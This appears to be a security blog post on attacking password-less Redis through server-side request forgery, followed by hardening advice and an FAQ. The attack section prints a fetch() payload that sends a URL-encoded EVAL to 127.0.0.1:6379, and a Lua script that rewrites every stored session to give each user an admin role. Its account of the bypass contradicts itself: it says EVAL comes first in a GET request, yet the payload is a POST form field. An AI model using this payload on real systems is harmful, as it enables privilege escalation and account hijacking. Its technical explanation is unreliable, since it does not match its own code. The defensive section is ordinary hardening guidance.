You think your Redis is a fortress. You’ve heard the campfire stories about old hacks, the cross-protocol weirdness that got patched ages ago. You’ve set a password, maybe even tucked it behind a firewall. You’re safe.
But there’s a ghost in the machine. A clever little exploit that doesn’t bother with the walls. It walks right past the bouncer at the front door because it knows something the bouncer doesn’t.
Let’s pull back the curtain.
The Target: Why Redis is a Hacker’s Goldmine
First, you gotta understand what Redis is and why it’s such a juicy target. It’s not just a database; it’s an in-memory data store. That means it’s screaming fast. Developers use it for the stuff that needs to happen right now:
- Caching: The data that makes your site feel snappy.
- Session Stores: The keys to the kingdom. Literally. The bits of data that prove who your users are, what’s in their shopping carts, and whether they’re an admin or a regular Joe.
- Real-Time Data: Leaderboards, notifications, live analytics.
Breaching Redis isn’t just a data leak. It’s a full-blown system compromise waiting to happen. It’s how an attacker goes from an outsider to holding the keys to every user’s account. This is why its cyber security isn’t a “nice-to-have.” It’s everything.
The Old Guard: How Redis Tried to Defend Itself
To get how the new hack works, you have to know the old one. Hackers figured out they could talk HTTP to a Redis port. They’d send a POST request. Redis isn’t a web server, so it would just toss the headers. But it might accidentally run commands it found in the request body. A huge security hole.
The Redis team fought back. They were smart. They hired a bouncer for the club. A function called securityWarningCommand.
// This is the bouncer. See a problem? Slam the door shut.
void securityWarningCommand(client *c) {
serverLog(LL_WARNING,"Possible SECURITY ATTACK detected... Connection aborted.");
freeClientAsync(c); // Kills the connection
}
Then they gave the bouncer a tiny blocklist. The words post and host:.
// The blocklist. If you see these words at the start, call the bouncer.
struct redisCommand redisCommandTable[] = {
{"post", securityWarningCommand, ...},
{"host:", securityWarningCommand, ...},
};
The plan was simple. If Redis saw a request start with post or host:, it would call the bouncer. The bouncer would kill the connection. Attack stopped. Simple. Clean. Right?
Wrong.
The Bypass Exploit: The Ghost in the Machine
Here’s the beautiful mistake. The fatal flaw. The bouncer was only trained to look for trouble at the very beginning of the conversation. The whole security plan depends on the order things are seen.
This exploit is all about timing. It’s a magic trick.
The attacker doesn’t send a POST. They send a GET request. And they stick their evil Redis command right at the very beginning of the URL path.
Redis gets the data stream and starts reading it like a piece of ticker tape.
- The first thing it sees is
EVAL—a real Redis command for running scripts. It looks at its list and says, “Hey,EVALis a legit command. I’ll run it.” - And just like that, our malicious script executes. The damage is done.
- Then Redis keeps reading. Way down the line, it finally stumbles upon the
Host:header. Now it gets confused. The bouncer wakes up and panics. He runs the security check. - The connection gets terminated. But it’s way too late. The thief is already gone.
The exploit works because our real command was processed before the security trap for the HTTP header was ever sprung. It’s a perfect abuse of the system’s own logic.
So, what does a target look like? You might think your setup is safe. It might even look something like this in your redis.conf file:
bind 127.0.0.1
port 6379
protected-mode yes
maxmemory 1gb
maxmemory-policy allkeys-lru
appendonly no
save ""
See that? protected-mode yes. bind 127.0.0.1. Looks good, right? Locked down from the outside. But notice what’s missing? There’s no requirepass. No password. This is the unlocked door the ghost walks through. The server trusts any connection coming from the inside, and that’s exactly what the next step provides.
The Heist: Weaponizing the Key with SSRF
So you have this skeleton key. This beautiful little flaw. How does a bad guy actually use it? They find a weak spot on a website—a feature that fetches data from other URLs. This is a classic SSRF attack (Server-Side Request Forgery).
They aren’t hacking Redis directly. They’re tricking the web application into doing the dirty work. The server is duped into attacking itself from the inside.
They send a weaponized payload. A carefully crafted instruction for the server.
// This tells the website to attack its own Redis server.
fetch("http://target-app.com/api/vulnerable_endpoint", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: `url=http://127.0.0.1:6379/&eval+"local+user_sessions+%3d+redis.call('keys',+'session:*')%3b+for+_,+key+in+ipairs(user_sessions)+do+local+session_data+%3d+redis.call('get',+key)%3b+local+status,+obj+%3d+pcall(cjson.decode,+session_data)%3b+if+status+and+type(obj)+%3d%3d+'table'+and+obj['user_role']+~%3d+nil+then+obj['user_role']+%3d+'admin'%3b+redis.call('set',+key,+cjson.encode(obj))%3b+end+end%3b+return+'OK'"+0+`
});
That body looks like alphabet soup. But inside that mess is a beautiful little Lua script. It’s a privilege escalation machine. Here’s what that script does when it runs on the Redis server:
-- This little program is a session hijacker.
-- First it asks Redis: "hey show me all your user sessions".
local user_sessions = redis.call('keys', 'session:*')
-- Then it walks through every single one.
for _, key in ipairs(user_sessions) do
local session_data = redis.call('get', key)
-- It decodes the session to see what's inside.
local status, obj = pcall(cjson.decode, session_data)
-- Now for the magic. It looks for the user's role. And changes it.
if status and type(obj) == 'table' and obj['user_role'] ~= nil then
obj['user_role'] = 'admin' -- Hello, god mode.
-- It saves the new evil session right back into Redis.
redis.call('set', key, cjson.encode(obj))
end
end
return 'OK'
And that’s the heist. The script finds a regular user. It makes them an admin. The attacker now has a god-mode account on the website.
Fortifying the Gates: How You Fight Back
Feeling paranoid? Good. Now let’s turn that paranoia into action. This isn’t just a list; this is your new defense plan. These are the Redis security best practices that stop ghosts and brawlers alike.
Lock Down the Network
This is your first, best, and most important defense. Don’t let anyone who isn’t invited get near the door.
- Bind to Localhost: Your
redis.conffile should havebind 127.0.0.1. This means Redis only listens to the machine it’s running on. Never, ever set it to0.0.0.0unless you have an ironclad firewall. - Use Redis Protected Mode: This is on by default for a reason. It’s a safety net that stops Redis from talking to anyone but localhost if you forget to set a password. Leave it on.
- Firewall Everything: Your application server is the only thing that should be able to talk to your Redis port. Block everyone else. No exceptions.
Use Real Locks and Keys
- Set a Damn Good Password: Use the
requirepassdirective in your config. Make it long. Make it random. This is the single setting that would have stopped the attack we just described. - Use the Redis Access Control List (ACL): If you’re on Redis 6 or newer, this is mandatory. Don’t use one master key. Create different users with the minimum permissions they need to do their job. Your web app’s user probably doesn’t need to run
CONFIGorDEBUG, does it?
Don’t Leave Loaded Guns Lying Around
- Rename Dangerous Commands: An attacker can’t use a command they can’t find. You can rename or even disable commands that can cause catastrophic damage.
- In
redis.conf:rename-command FLUSHALL "ARE_YOU_SURE_FLUSHALL" - To disable it entirely:
rename-command CONFIG ""
- In
Fix the Root Problem: SSRF
- Validate Your Inputs: The real entry point for the heist was the application itself. Treat every URL or piece of data from a user as hostile.
- Use Allow-Lists, Not Block-Lists: Don’t try to guess what a malicious URL looks like. Define an explicit, strict list of hosts your application is allowed to talk to. Deny everything else.
Conclusion: The Game Never Ends
It’s not a brute force attack. It’s a whisper. A timing trick. A perfect example of how the most dangerous attacks use the system’s own rules against it. And it’s a chilling reminder that security is never finished.
You can’t just build a fortress and walk away. You have to watch the guards, check the locks, and understand that there’s always someone clever trying to find a new way in. They’re looking for the ghost in your machine. Don’t let them find it.
Frequently Asked Questions (FAQ)
What is the main risk of an exposed Redis instance?
In a word: everything. An attacker can steal all your data, hijack user accounts for privilege escalation, and use your server to attack your internal network. It’s a foothold that can lead to total system compromise.
How does Redis protected mode work?
It’s a simple safety catch. If you haven’t set a password and you haven’t explicitly told Redis which IPs to listen to, it defaults to only listening to the local machine. It’s designed to stop the most common and dangerous misconfiguration: accidentally exposing an unlocked database to the entire internet.
How can I check if my Redis server is vulnerable?
Don’t guess. Check. Use a tool like nmap from an external machine to see if your Redis port (6379) is visible. Read your redis.conf file. Is requirepass set to a strong password? Is bind set to 127.0.0.1? Have you disabled or renamed dangerous commands? A quick Redis vulnerability scanner can also help automate this check.
